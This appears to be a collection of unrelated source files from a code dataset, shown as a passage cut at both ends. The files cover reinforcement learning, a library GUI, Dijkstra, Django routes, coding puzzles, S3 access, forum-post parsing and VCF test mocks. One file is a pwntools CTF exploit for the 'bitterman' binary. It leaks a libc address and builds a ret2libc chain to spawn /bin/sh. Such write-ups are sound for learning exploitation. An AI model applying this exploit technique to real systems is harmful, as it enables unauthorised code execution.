return np.random.randint(self.nb_actions)\n\n def update_network(self):\n self.target_network = deepcopy(self.network)\n print(\"Target network updated\")\n\n def update_model(self, episode):\n if len(self.replay_memory) < 1000:\n return\n\n state, action, reward, next_state, done = get_training_sample(self.replay_memory, self.batch_size, self.device)\n\n predicted_q_values, next_state_pred = self.network(state.unsqueeze(dim=1))\n predicted_q_values = predicted_q_values[np.arange(self.batch_size), action]\n with torch.no_grad():\n next_q_values, _ = self.target_network(next_state.unsqueeze(dim=1))# N * A\n next_best_q_values = torch.max(next_q_values.detach(), dim=1)[0]\n target_q_values = reward + (self.gamma * (next_best_q_values * (1 - done)))\n q_loss = self.loss_function(predicted_q_values, target_q_values)\n state_loss = self.loss_function_state(next_state_pred, next_state)\n total_loss = q_loss + state_loss\n self.optimizer.zero_grad()\n total_loss.backward()\n for param in self.network.parameters():\n param.grad.data.clamp_(-1, 1)\n self.optimizer.step()\n self.loss_per_episode[\"Q-value loss\"][episode].append(q_loss.item())\n self.loss_per_episode[\"State loss\"][episode].append(state_loss.item())\n self.iterations += 1\n\n def update_episilon(self):\n if self.epsilon > 0.5:\n self.epsilon -= 0.03\n print(f\"Epsilon updated to: {self.epsilon}\")\n\n def load_model(self):\n self.network = torch.load(self.save_dir / \"checkpoint.pth\", map_location=self.device)\n print(\"Trained model loaded\")\n\n def save_model(self):\n torch.save(self.network, self.save_dir / \"checkpoint.pth\")\n print(\"Model saved\")\n\n def print_episode_loss(self, episode, steps, sum_of_rewards):\n print(\"-\" * 50)\n print(f\"Statistics for episode {episode}\")\n for loss_name in self.loss_names:\n print(f\"Average {loss_name} for last episode was: {np.mean(self.loss_per_episode[loss_name][episode])}\")\n print(f\"Duration of episode: {steps}\")\n print(f\"Sum of rewards: {sum_of_rewards}\")\n print(\"\")\n\n\n\n\n\n\n\n","sub_path":"Agents/dqn_agent.py","file_name":"dqn_agent.py","file_ext":"py","file_size_in_byte":4245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"327794303","text":"from addBook import *\nfrom deleteBook import *\nfrom issueBook import *\nfrom returnBook import *\nfrom viewBook import *\nimport csv\nfrom datetime import datetime\nimport tkinter\nimport tkinter.messagebox\n\ntoday = datetime.today()\nattendance_csv = '/Users/naukadhabalia/git/library-management/face-recognition/Attendance'+today.strftime(\"%m_%d_%y\")+'.csv'\n# attendance_csv = '/Users/naukadhabalia/git/library-management/face-recognition/Attendance08_20_21.csv'\n\nclass drawBookModule:\n def __init__(self):\n window = Tk()\n window.title(\"Library Management System - Dashboard\")\n window.minsize(width=400, height=400)\n window.geometry(\"600x500\")\n\n headingFrame1 = Frame(window, bg=\"green\", bd=5)\n headingFrame1.place(relx=0.2, rely=0.1, relwidth=0.6, relheight=0.16)\n\n headingFrame2 = Frame(headingFrame1, bg=\"#EAF0F1\")\n headingFrame2.place(relx=0.01, rely=0.05, relwidth=0.98, relheight=0.9)\n\n headingLabel = Label(headingFrame2, text=\"Welcome, User!\", fg='black')\n headingLabel.place(relx=0.02, rely=0.2, relwidth=0.96, relheight=0.5)\n\n addbtn = Button(window, text=\"Add New Book\", command=addBooks, bg=\"#455A64\", fg=\"blue\")\n addbtn.place(relx=0.35, rely=0.30, relwidth=0.30, relheight=0.08)\n\n deletebtn = Button(window, text=\"Delete a Book\", command=deleteBooks, bg=\"#455A64\", fg=\"blue\")\n deletebtn.place(relx=0.35, rely=0.40, relwidth=0.30, relheight=0.08)\n\n issuebtn = Button(window, text=\"Issue a Book\", command=issueBooks, bg=\"#455A64\", fg=\"blue\")\n issuebtn.place(relx=0.35, rely=0.50, relwidth=0.30, relheight=0.08)\n\n returnbtn = Button(window, text=\"Return Book\", command=returnBooks, bg=\"#455A64\", fg=\"blue\")\n returnbtn.place(relx=0.35, rely=0.60, relwidth=0.30, relheight=0.08)\n\n viewbtn = Button(window, text=\"List of Books\", command=viewBooks, bg=\"#455A64\", fg=\"blue\")\n viewbtn.place(relx=0.35, rely=0.70, relwidth=0.30, relheight=0.08)\n\n viewbtn = Button(window, text=\"View Student entry Logs\", command=read_csv, bg=\"#455A64\", fg=\"blue\")\n viewbtn.place(relx=0.35, rely=0.80, relwidth=0.30, relheight=0.08)\n\n greet = Label(window, font=('arial', 13, 'bold'), text=\"Thank you\")\n #greet.place(relx=0.35, rely=0.90, relwidth=0.30, relheight=0.08)\n\n window.mainloop()\n\n\ndef read_csv():\n try:\n with open(attendance_csv, 'r') as file:\n reader = csv.reader(file)\n entry_logs = ''\n for row in reader:\n print(row)\n if(len(row) == 2):\n entry_logs = entry_logs +\"Name - \"+ row[0]+\" Time - \"+row[1] + \"\\n\"\n print(entry_logs)\n messagebox.showinfo(\"Entry Logs : \"+today.strftime(\"%m/%d/%y\"),entry_logs)\n except Exception as e :\n messagebox.showerror('Error', e)\n\ndef manageBookOperations():\n obj = drawBookModule()\n","sub_path":"student/bookHome.py","file_name":"bookHome.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"163620377","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom Interface import saisirMatrice, genereMatriceAleatoire, afficheChemin\r\nfrom Fichier import chargeMatriceDeCarte\r\nfrom Algo import dijkstra\r\n\r\n\r\ndef meilleurCheminDijkstra():\r\n print('Quel activité voulez-vous faire?\\n','1- Saisir une matrice personnalisé.')\r\n print(' 2- Générer aléatoirement une matrice.\\n','3- Charger une carte topographique')\r\n\r\n choix = int(input('>'))\r\n \r\n if (choix == 1):\r\n matrice = saisirMatrice()\r\n elif (choix == 2):\r\n nbSommets = input('Donner le nombre de sommets : ')\r\n matrice = genereMatriceAleatoire(nbSommets)\r\n elif (choix == 3):\r\n nomFichier = input('Donner le nom du fichier à ouvrir : ')\r\n matrice = chargeMatriceDeCarte(nomFichier)\r\n else:\r\n print('Choix invalide.')\r\n return\r\n \r\n depart = int(input('Donner le noeuds de depart : '))\r\n arrive = int(input('Donner le noeuds d''arrivée : '))\r\n\r\n [distance, predecesseurs] = dijkstra(matrice, depart, arrive)\r\n print('La distance minimale est ', distance)\r\n afficheChemin(predecesseurs, depart, arrive)\r\n \r\n\r\nif __name__ == '__main__':\r\n meilleurCheminDijkstra()\r\n","sub_path":"Principale.py","file_name":"Principale.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"65465149","text":"#!/usr/bin/python\nfrom pwn import *\n#opens up in a new tmux window\ncontext(terminal=['tmux' , 'new-window'])\n# becomes handy once you stuck\n#p=gdb.debug('./bitterman' , 'b main')\n#Linux info for pwntools\ncontext(os=\"Linux\" , arch=\"amd64\")\n#opens up the binary\np=process('./bitterman')\n# objdump -D bitterman | grep main , puts \nmain = p64(0x4006ec)\nputs_plt=p64(0x400520)\nputs_got=p64(0x600c50)\n #R2 BITTERMAN; /R rdi\n # 0x00400853 5f pop rdi \n # 0x00400854 c3 ret \npop_rdi=p64(0x400853)\n#gdb bitterman pattern create 1000 ; pattern offset at the value of sigev\njunk=\"A\"*152\n#skeleton payload to leak the puts addres @ Glibc\npayload=junk+pop_rdi+puts_got+puts_plt+main\n# some pwntools magic to send the payload ;)\np.recvuntil(\"name?\")\np.sendline(\"pu\")\np.recvuntil(\"message:\")\np.sendline(\"1000\")\np.recvuntil(\"text:\")\np.sendline(payload)\np.recvuntil(\"Thanks!\")\nleak = p.recv()[:8].strip().ljust(8, '\\x00')\nlog.success(\"Leaked Address (Puts) : \"+ str(leak))\nleak = u64(leak)#unpack the leak address\n\n#leak = struct.unpack('Q', leak)[0] ;becomes handy if the above u64 didn't works \n# the hard part, The stategey is to first get the address where the libc sits in the memory and in the binary and then subtract those thow memory to get the actual offset of the binary, so every time the binary runs it will make new offsets and new offset + memory of the main,system,and /bin/sh gives us the actual address of the main , system,/bin/sh ;) \nput_libc = 0x74040\nsystem_libc = 0x46ff0\nbinsh = 0x183cee\n\noffset = leak - put_libc\nsys = p64(offset + system_libc)\nsh = p64(offset + binsh)\npayload = junk + pop_rdi + sh + sys\n#p.recvuntil(\"name?\")\np.sendline(\"pu\")\np.recvuntil(\"message:\")\np.sendline(\"1000\")\np.recvuntil(\"text:\")\np.sendline(payload)\np.recvuntil(\"Thanks!\")\np.interactive()\n","sub_path":"bitterman-Campctf2015-manual.py","file_name":"bitterman-Campctf2015-manual.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"156797273","text":"from django.conf.urls import url\nfrom django.contrib.auth.decorators import login_required\nfrom webadmin import views\n\n\nurlpatterns = [\n # Visits\n url(r'^$', views.index, name='index'),\n url(r'^visits/$', views.visit_list, name='visit_list'),\n url(r'^visit/(?P[0-9]+)/$', views.visit_detail, name='visit_detail'),\n\n # Visitors\n url(r'^visitors/$', views.visitor_list, name='visitor_list'),\n url(r'^visitors/(?P[0-9]+)/$', views.visitor_details, name='visitor_details'),\n url(r'^visitors/(?P[0-9]+)/edit$', login_required(views.VisitorUpdate.as_view()), name='update_visitor'),\n url(r'^visitors/create/$', login_required(views.VisitorCreate.as_view()), name='create_visitor'),\n\n url(r'^contact/$', views.contact, name='contact')\n]\n","sub_path":"Ringo/webadmin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"343070015","text":"#!/bin/python3\n\nimport sys\n\n\nt = int(input().strip())\nfor a0 in range(t):\n b,w = input().strip().split(' ')\n b,w = [int(b),int(w)]\n x,y,z = input().strip().split(' ')\n x,y,z = [int(x),int(y),int(z)]\n \n if x + z < y:\n # buy only black gifts\n print((b+w)*x + w*z)\n elif y + z < x:\n print((b+w)*y + b*z)\n else :\n print(b*x + w*y)\n\n\n","sub_path":"Competitive Programming/hackerrank/Algorithm/Implementation/taum_and_bday.py","file_name":"taum_and_bday.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"643704621","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: longshuicui\n@date : 2021/4/23\n@function:\n303. 区域和检索 - 数组不可变 (Easy)\nhttps://leetcode-cn.com/problems/range-sum-query-immutable/\n给定一个整数数组 nums,求出数组从索引i到j(i≤j)范围内元素的总和,包含i、j两点。\n\n实现 NumArray 类:\n\nNumArray(int[] nums) 使用数组 nums 初始化对象\nint sumRange(int i, int j) 返回数组 nums 从索引i到j(i≤j)范围内元素的总和,包含i、j两点(也就是 sum(nums[i], nums[i + 1], ... , nums[j]))\n\"\"\"\n\nclass NumArray:\n \"\"\"遍历求和,时间复杂度O(n)\"\"\"\n def __init__(self, nums):\n self.arrays=nums\n\n def sumRange(self, left, right):\n res=0\n for i in range(left, right+1):\n res+=self.arrays[i]\n return res\n\nclass NumArrayAdvance:\n \"\"\"sum[j]-sum[i-1]的结果即为[i, j]的加和,这里时间复杂度为O(1)\n 记录了当前位置的前缀和(包含当前下标)\n \"\"\"\n def __init__(self, nums):\n self.sum=[0]\n for num in nums:\n self.sum.append(num+self.sum[-1])\n\n def sumRange(self, left, right):\n res=self.sum[right+1]-self.sum[left-1+1]\n return res\n\n\nnums=[-2, 0, 3, -5, 2, -1]\nobj=NumArrayAdvance(nums)\nres=obj.sumRange(0,5)\nprint(res)","sub_path":"06.动态规划/前缀问题/303. 区域和检索 - 数组不可变(Easy).py","file_name":"303. 区域和检索 - 数组不可变(Easy).py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"379485066","text":"import logging\nimport tempfile\nfrom sys import path\n\nfrom core_lib.data_layers.data_access.data_access import DataAccess\nfrom core_lib.data_layers.data.session.object_data_session_factory import ObjectDataSessionFactory\n\n\nclass ObjectsDataAccess(DataAccess):\n\n def __init__(self, data_session_factory: ObjectDataSessionFactory):\n DataAccess.__init__(self, data_session_factory)\n self.logger = logging.getLogger(self.__class__.__name__)\n\n def get_object(self, bucket_name: str, object_name: str):\n with tempfile.TemporaryFile() as file_name:\n with self.get_session() as s3:\n s3.download_fileobj(bucket_name, object_name, file_name)\n file_content = path(file_name).bytes()\n return file_content\n\n def set_object(self, bucket_name: str, value):\n with tempfile.TemporaryFile() as tmp_file:\n tmp_file.write(value.encode())\n with self.get_session() as session:\n session.upload_file(tmp_file.name, bucket_name, value)\n","sub_path":"examples/objects_core_lib/core_lib/data_layers/data_access/objects_data_access.py","file_name":"objects_data_access.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"621413985","text":"# This program is the first step of transforming the original CLPysch dataset\n# into the form that we need to start creating post-reply sets\n\nimport os\nimport re\nimport xml.etree.ElementTree as ET\nfrom bs4 import BeautifulSoup\n\nloginsList = []\nloginsFile = open('logins.txt', 'w')\npostsList = []\npostsFile = open('posts.txt', 'w')\n\n# normalize and cleanup tokens that could be usernames\ndef parseUsername(input):\n inputLower = input.lower()\n inputLowerClean = re.sub(r'[^a-z]', '', inputLower)\n # handle a few edge cases where usernames have no letters\n if inputLowerClean == '':\n inputLowerClean = input\n return inputLowerClean\n\n# create a list of all the moderator ID numbers to reference later when we filter\nranks = open('author_rankings.tsv', 'r').readlines()\nmodsList = []\nfor line in ranks:\n lineTokens = line.split('\\t')\n if 'Mod' in lineTokens[1] or 'Crew' in lineTokens[1] or 'Staff' in lineTokens[1]:\n modsList.append(lineTokens[0])\n\n# create a list of all simplified usernames to check against as we extract usernames from text\nfor dirName, subdirList, fileList in os.walk('posts'):\n for fname in fileList:\n tree = ET.parse('posts/' + fname)\n response = tree.getroot()\n if response.get('status') == 'error':\n continue\n message = response[0]\n login = message.find('author')[0].text\n # deal crudely with the case of login names that include spaces...\n # looking at the list of names, it appears that this won't produce duplicates\n simplifiedLogin = parseUsername(login.split()[0])\n if simplifiedLogin not in loginsList:\n loginsList.append(simplifiedLogin)\nloginsList.sort()\nfor line in loginsList:\n loginsFile.write(line + '\\n')\nloginsFile.close()\n\n# process all the individual post XML files and create a single text file\n# in the format that will be easier for us to process in the next step\nfor dirName, subdirList, fileList in os.walk('posts'):\n for fname in fileList:\n tree = ET.parse('posts/' + fname)\n response = tree.getroot()\n if response.get('status') == 'error':\n continue\n message = response[0]\n id = message.find('id').text\n if id is None:\n continue\n time = message.find('post_time').text\n authorID = message.find('author').get('href')[10:]\n if authorID in modsList:\n modBoolean = 'T'\n else:\n modBoolean = 'F'\n thread = message.find('thread').get('href')\n if thread == '/threads/id/1810':\n negToPosBoolean = 'T'\n else:\n negToPosBoolean = 'F'\n login = message.find('author')[0].text\n simplifiedLogin = parseUsername(login.split()[0])\n rawBody = message.find('body').text\n\n # handle some posts in the dataset that are inexplicably blank\n if rawBody is None:\n continue\n\n # extract usernames from the post body\n htmlRemovedBody = BeautifulSoup(rawBody).text\n quotedUsers = ' '\n htmlRemovedBodyTokens = htmlRemovedBody.split()\n lastToken = ''\n for token in htmlRemovedBodyTokens:\n if lastToken == 'Hi' or lastToken == 'hi' or lastToken == 'Hello' or lastToken == 'hello' or lastToken == 'Hey' or lastToken == 'hey':\n if parseUsername(token) in loginsList:\n quotedUsers = quotedUsers + parseUsername(token) + ' '\n lastToken = token\n continue\n if token.startswith('wrote:'):\n if parseUsername(lastToken) in loginsList:\n quotedUsers = quotedUsers + parseUsername(lastToken) + ' '\n lastToken = token\n continue\n if token.startswith('@'):\n if parseUsername(token) in loginsList:\n quotedUsers = quotedUsers + parseUsername(token) + ' '\n lastToken = token\n continue\n lastToken = token\n\n # clean up post body text\n quotesRemovedBody = re.sub(r\"(.*?)\", '', rawBody, 0, re.S)\n htmlRemovedQuotesRemovedBody = BeautifulSoup(quotesRemovedBody).text\n htmlRemovedQuotesRemovedBodyTokens = htmlRemovedQuotesRemovedBody.split()\n finalTextBody = ' '.join(htmlRemovedQuotesRemovedBodyTokens)\n\n # put it all together\n postString = time + '\\t' + id + '\\t' + simplifiedLogin + '\\t[' + quotedUsers + ']\\t' + finalTextBody + '\\t' + modBoolean + '\\t' + login + '\\t' + negToPosBoolean\n postsList.append(postString)\n\npostsList.sort()\nfor line in postsList:\n postsFile.write(line + '\\n')\npostsFile.close()\n","sub_path":"combinePosts.py","file_name":"combinePosts.py","file_ext":"py","file_size_in_byte":4742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"31767438","text":"from typing import List\n\nclass Solution:\n\n def find_single_num_by_bit(self, nums: List[int]) -> int:\n bitwise_count = 0\n for i in range(32):\n cur_bit = 0\n for j in range(len(nums)):\n cur_bit += (abs(nums[j]) >> i) & 1\n bitwise_count |= (cur_bit % 3) << i\n if nums.count(bitwise_count) == 1:\n return bitwise_count\n else:\n return -bitwise_count\n\n def singleNumber(self, nums: List[int]) -> int:\n return self.find_single_num_by_bit(nums)\n\narr = [0,1,0,1,0,1,99]\nprint(Solution().singleNumber(arr))\n\n","sub_path":"leetcode/2nd_Round/137.py","file_name":"137.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"297728301","text":"import json\n\n# import api keys\nwith open('./sensitive.json') as data_file: \n sensitive = json.load(data_file)\n azure_key = sensitive['AZURE_KEY']\n\ndef get_tags(request_body):\n print('adding photo...')\n import httplib, urllib, base64\n\n headers = {\n # Request headers\n 'Content-Type': 'application/json',\n 'Ocp-Apim-Subscription-Key': azure_key\n }\n\n params = urllib.urlencode({\n # Request parameters\n 'visualFeatures': 'Categories,Description,Color',\n 'language': 'en',\n })\n\n try:\n conn = httplib.HTTPSConnection('westus.api.cognitive.microsoft.com')\n conn.request(\"POST\", \"/vision/v1.0/analyze?%s\" % params, request_body, headers)\n response = conn.getresponse()\n data = response.read()\n conn.close()\n except Exception as e:\n print(\"[Errno {0}] {1}\".format(e.errno, e.strerror))\n\n stringified_data = json.loads(data)\n print('result is: ', stringified_data['description']['tags'])\n return stringified_data['description']['tags']\n","sub_path":"flask_server/app/azure_get_tags.py","file_name":"azure_get_tags.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"641630716","text":"from django.conf import settings\nfrom django.shortcuts import get_object_or_404\nfrom classes.models import GymClass\n\n\ndef cart_contents(request):\n\n cart_items = []\n total = 0\n product_count = 0\n item_total = 0\n\n cart = request.session.get('cart', {})\n\n for item_id, item_data in cart.items():\n if isinstance(item_data, int):\n gym_class = get_object_or_404(GymClass, pk=item_id)\n total += item_data * gym_class.price\n product_count += item_data\n item_total += product_count * gym_class.price\n cart_items.append({\n 'item_id': item_id,\n 'quantity': item_data,\n 'item_total': item_total,\n 'gym_class': gym_class,\n })\n else:\n gym_class = get_object_or_404(GymClass, pk=item_id)\n total += quantity * gym_class.price\n product_count += quantity\n item_total += product_count * gym_class.price\n cart_items.append({\n 'item_id': item_id,\n 'quantity': quantity,\n 'item_total': item_total,\n 'gym_class': gym_class,\n })\n\n context = {\n 'cart_items': cart_items,\n 'total': total,\n 'product_count': product_count,\n }\n\n return context\n","sub_path":"cart/contexts.py","file_name":"contexts.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"175970808","text":"#pylint: disable=line-too-long,too-many-public-methods,invalid-name\n#pylint: disable=missing-docstring,protected-access,too-few-public-methods\n#pylint: disable=too-many-arguments,too-many-instance-attributes\nfrom __future__ import print_function, absolute_import, division\n\nfrom collections import OrderedDict\nimport os\nimport re\nimport sys\nimport unittest\n\nfrom testfixtures import TempDirectory\n\nimport jacquard.utils.utils as utils\nfrom jacquard.utils.vcf import VcfRecord, VcfReader, FileWriter, FileReader\nimport test.utils.test_case as test_case\n\n\ntry:\n from StringIO import StringIO\nexcept ImportError:\n from io import StringIO\n\n\nclass MockFileWriter(object):\n def __init__(self):\n self._content = []\n self.opened = False\n self.closed = False\n\n def open(self):\n self.opened = True\n\n def write(self, content):\n if content == None:\n return\n self._content.extend(content.splitlines())\n\n def lines(self):\n return self._content\n\n def close(self):\n self.closed = True\n\n\nclass MockFileReader(object):\n def __init__(self, input_filepath=\"/foo/mockFileReader.txt\", content=None):\n self.input_filepath = input_filepath\n self.file_name = os.path.basename(input_filepath)\n if content is None:\n self.content = []\n else:\n self.content = content\n self.open_was_called = False\n self.close_was_called = False\n self.lines_to_iterate = None\n\n def open(self):\n self.open_was_called = True\n self.lines_to_iterate = list(self.content)\n\n def read_lines(self):\n for line in self.lines_to_iterate:\n yield line\n\n def close(self):\n self.close_was_called = True\n self.lines_to_iterate = None\n\n def __lt__(self, other):\n return self.file_name < other.file_name\n\nclass MockWriter(object):\n def __init__(self, output_filepath=None):\n self._content = []\n if output_filepath:\n self.output_filepath = output_filepath\n else:\n self.output_filepath = \"foo\"\n self.opened = False\n self.closed = False\n\n def open(self):\n self.opened = True\n\n def write(self, content):\n self._content.extend(content.splitlines())\n\n def lines(self):\n return self._content\n\n def close(self):\n self.closed = True\n\nclass MockVcfReader(object):\n def __init__(self,\n input_filepath=\"vcfName\",\n metaheaders=None,\n column_header='#CHROM\\tPOS\\tID\\tREF\\tALT\\tQUAL\\tFILTER\\tINFO\\tFORMAT\\tNORMAL\\tTUMOR',\n content=None,\n records=None,\n sample_names=None):\n\n if content is None:\n self.content = [\"foo\"]\n else:\n self.content = content\n\n if metaheaders is None:\n self.metaheaders = [\"##metaheaders\"]\n else:\n self.metaheaders = metaheaders\n\n if records:\n self.records = records\n elif content:\n self.records = [MockVcfRecord.parse_record(line) for line in self.content]\n else:\n self.records = []\n\n if sample_names is None:\n self.sample_names = []\n else:\n self.sample_names = sample_names\n self.file_name = input_filepath\n self.input_filepath = input_filepath\n self.column_header = column_header\n self.split_column_header = self.column_header.strip(\"#\").split(\"\\t\")\n self.opened = False\n self.closed = False\n self._caller_name = \"mockCaller\"\n self.qualified_sample_names = self._create_qualified_sample_names()\n self.format_tags={}\n\n def open(self):\n self.opened = True\n #pylint:disable=unused-argument\n def vcf_records(self, dummy=None, qualified=False):\n for record in self.records:\n yield record\n\n def tagged_vcf_records(self):\n for record in self.records:\n yield record\n\n def _get_tag_metaheaders(self, regex_exp):\n tag_dict = {}\n for metaheader in self.metaheaders:\n tag = re.match(regex_exp, metaheader)\n if tag:\n tag_key = tag.group(1)\n tag_dict[tag_key] = metaheader.strip()\n\n return tag_dict\n\n @property\n def format_metaheaders(self):\n return dict(self._get_tag_metaheaders(\"^##FORMAT=.*?[<,]ID=([^,>]*)\"))\n\n @property\n def info_metaheaders(self):\n return dict(self._get_tag_metaheaders(\"^##INFO=.*?[<,]ID=([^,>]*)\"))\n\n @property\n def filter_metaheaders(self):\n return dict(self._get_tag_metaheaders(\"^##FILTER=.*?[<,]ID=([^,>]*)\"))\n\n @property\n def contig_metaheaders(self):\n return dict(self._get_tag_metaheaders(\"^##contig=.*?[<,]ID=([^,>]*)\"))\n\n @property\n def non_format_metaheaders(self):\n return self.metaheaders\n\n def _create_qualified_sample_names(self):\n patient_prefix = self.file_name.split(\".\")[0]\n qualified_names = []\n if self.sample_names:\n for sample_name in self.sample_names:\n qualified_names.append(\"|\".join([patient_prefix, sample_name]))\n else:\n qualified_names.append(\"|\".join([\"foo\", \"bar\"]))\n return qualified_names\n\n def modify_metaheader(self, original_metaheader, transformed_tag):\n pass\n\n def store_format_tags(self, original_tag, new_tag):\n self.format_tags[original_tag] = new_tag\n\n @property\n def caller_name(self):\n return self._caller_name\n\n def close(self):\n self.closed = True\n\n\nclass MockCaller(object):\n def __init__(self, name=\"MockCaller\", metaheaders=None, claimable=None):\n if claimable:\n self.claimable = claimable\n else:\n self.claimable = set()\n self.name = name\n if metaheaders:\n self.metaheaders = metaheaders\n else:\n self.metaheaders = [\"##mockMetaheader1\"]\n self.file_name_search = \"snps|indels\"\n\n @staticmethod\n def add_tags(vcfRecord):\n return vcfRecord\n\n @staticmethod\n def decorate_files(filenames, dummy):\n return filenames[0]+\"foo\"\n\n def get_new_metaheaders(self):\n return self.metaheaders\n\n def claim(self, file_readers):\n unclaimed = list(set(file_readers).difference(self.claimable))\n claimed = list(set(file_readers).intersection(self.claimable))\n return unclaimed, claimed\n\nclass MockVcfRecord(object):\n @classmethod\n def parse_record(cls, vcf_line):\n vcf_fields = vcf_line.rstrip().split(\"\\t\")\n chrom, pos, rid, ref, alt, qual, rfilter, info, rformat \\\n = vcf_fields[0:9]\n samples = vcf_fields[9:]\n return MockVcfRecord(chrom, pos, ref, alt, rid, qual, rfilter, info,\n rformat, samples)\n\n def __init__(self, chrom, pos, ref, alt,\n vcf_id=\".\", qual=\".\", vcf_filter=\".\", info=\".\", vcf_format=\".\",\n samples=None):\n self.chrom = chrom\n self.pos = pos\n self.id = vcf_id\n self.ref = ref\n self.alt = alt\n self.qual = qual\n self.filter = vcf_filter\n self.info = info\n self.info_dict = self._init_info_dict()\n self.format = vcf_format\n if samples is None:\n self.samples = []\n else:\n self.samples = samples\n\n tags = self.format.split(\":\")\n self.format_set = tags\n\n self.sample_tag_values = {}\n for i, sample in enumerate(self.samples):\n values = sample.split(\":\")\n self.sample_tag_values[i] = OrderedDict(zip(tags, values))\n\n def get_empty_record(self):\n return MockVcfRecord(self.chrom, self.pos, self.ref, self.alt)\n\n def _init_info_dict(self):\n info_dict = {}\n\n for key_value in self.info.split(\";\"):\n if \"=\" in key_value:\n key, value = key_value.split(\"=\")\n info_dict[key] = value\n else:\n info_dict[key_value] = key_value\n\n return info_dict\n\n @property\n def format_tags(self):\n \"\"\"Returns set of format tags.\"\"\"\n tags = VcfRecord._EMPTY_SET\n if self.sample_tag_values:\n first_sample = list(self.sample_tag_values.keys())[0]\n tags = set(self.sample_tag_values[first_sample].keys())\n return tags\n\n def add_sample_tag_value(self, tag_name, new_sample_values):\n for sample in self.sample_tag_values.keys():\n value = str(new_sample_values[sample])\n self.sample_tag_values[sample][tag_name] = value\n\n def text(self):\n stringifier = [self.chrom, self.pos, self.id, self.ref, self.alt,\n self.qual, self.filter, self.info,\n \":\".join(self.format_set)]\n\n for key in self.sample_tag_values:\n stringifier.append(\":\".join(self.sample_tag_values[key].values()))\n\n return \"\\t\".join(stringifier) + \"\\n\"\n\n def __eq__(self, other):\n return (\"^\".join([self.chrom,\n self.pos,\n self.ref,\n self.alt]) == other)\n\nclass MockTag(object):\n def __init__(self, field_name=None, sample_values=None, metaheader=None):\n self.field_name = field_name\n if sample_values:\n self.sample_values = sample_values\n else:\n self.sample_values = {}\n if metaheader:\n self.metaheader = metaheader\n else:\n self.metaheader = []\n\n def add_tag_values(self, vcf_record):\n vcf_record.add_sample_tag_value(self.field_name, self.sample_values)\n\n#TODO: (cgates) Fix tests to not use parse_record() and text().\nclass VcfRecordTestCase(test_case.JacquardBaseTestCase):\n def test_parse_record(self):\n sample_names = [\"SampleA\", \"SampleB\"]\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FOO:BAR|SA_foo:SA_bar|SB_foo:SB_bar\\n\")\n record = VcfRecord.parse_record(input_line, sample_names)\n self.assertEquals(\"CHROM\", record.chrom)\n self.assertEquals(\"POS\", record.pos)\n self.assertEquals(\"ID\", record.vcf_id)\n self.assertEquals(\"REF\", record.ref)\n self.assertEquals(\"ALT\", record.alt)\n self.assertEquals(\"QUAL\", record.qual)\n self.assertEquals(\"FILTER\", record.filter)\n self.assertEquals(\"INFO\", record.info)\n\n def test_parse_record_removesNewlines(self):\n sample_names = [\"SampleA\"]\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FOO:BAR|SB_foo:SB_bar\\n\")\n record = VcfRecord.parse_record(input_line, sample_names)\n self.assertEquals(\"SB_bar\", record.sample_tag_values[\"SampleA\"][\"BAR\"])\n\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FOO:BAR|SB_foo:SB_bar\\r\")\n record = VcfRecord.parse_record(input_line, sample_names)\n self.assertEquals(\"SB_bar\", record.sample_tag_values[\"SampleA\"][\"BAR\"])\n\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|FOO:BAR|SB_foo:SB_bar\\r\\n\")\n record = VcfRecord.parse_record(input_line, sample_names)\n self.assertEquals(\"SB_bar\", record.sample_tag_values[\"SampleA\"][\"BAR\"])\n\n def test_format_tags(self):\n sample_names = [\"SampleA\", \"SampleB\"]\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|F1:F2:F3|SA.1:SA.2:SA.3|SB.1:SB.2:SB.3\\n\")\n record = VcfRecord.parse_record(input_line, sample_names)\n self.assertEquals(set([\"F1\", \"F2\", \"F3\"]), record.format_tags)\n\n def test_format_tags_emptyWhenNoSamples(self):\n sample_names = []\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO\\n\")\n record = VcfRecord.parse_record(input_line, sample_names)\n self.assertEquals(set(), record.format_tags)\n\n def test_format_field(self):\n sample_names = [\"SA\", \"SB\"]\n input_line = self.entab(\"CHROM|POS|ID|REF|ALT|QUAL|FILTER|INFO|F3:F1:F2|SA.1:SA.2:SA.3|SB.1:SB.2:SB.3\\n\")\n record = VcfRecord.parse_record(input_line, sample_names)\n self.assertEquals([\"F3\", \"F1\", \"F2\"], list(record._format_tag_fields()))\n\n def test_format_field_emptyWhenNoSamples(self):\n input_line = 